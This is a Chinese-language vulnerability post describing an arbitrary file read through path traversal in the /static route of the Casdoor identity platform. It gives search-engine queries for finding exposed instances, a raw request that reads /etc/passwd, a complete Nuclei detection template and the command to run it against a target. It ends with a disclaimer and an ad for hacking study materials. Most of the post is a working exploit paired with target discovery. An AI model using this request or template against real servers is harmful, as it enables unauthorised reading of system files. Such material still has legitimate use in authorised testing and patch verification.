【漏洞介绍】
Casdoor系统static存在任意文件读取漏洞
【漏洞描述】
Casdoor是一个基于OAuth 2.0、OIDC、SAML 和 CAS 的,UI-first的身份和访问管理(IAM)/单点登录(SSO)平台。使用 Go 和react开发,前后端分离,内置第三方应用登录服务。
【资产测绘Query】
Fofa:title:”Casdoor”
Hunter:web.title=”Casdoor”
【漏洞复现】
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: 127.0.0.1
【Nuclei-Poc】
id: template-id
info:
name: Template Name
author: xxx
severity: info
description: description
reference:
- https://
tags: tags
requests:
- raw:
- |+
GET /static/../../../../../../../../../../../etc/passwd HTTP/1.1
Host: {{Hostname}}
matchers-condition: and
matchers:
- type: word
part: body
words:
- root
- type: status
status:
- 200
- type: regex
regex:
- "root:[x*]:0:0"
【验证】
nuclei.exe -duc -u http://target.com -t C:\Users\xxx\nuclei-templates\Casdoor-demo.yaml -debug
声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
免费领取安全学习资料包!
渗透工具
技术文档、书籍
面试题
帮助你在面试中脱颖而出
视频
基础到进阶
环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
应急响应笔记
学习路线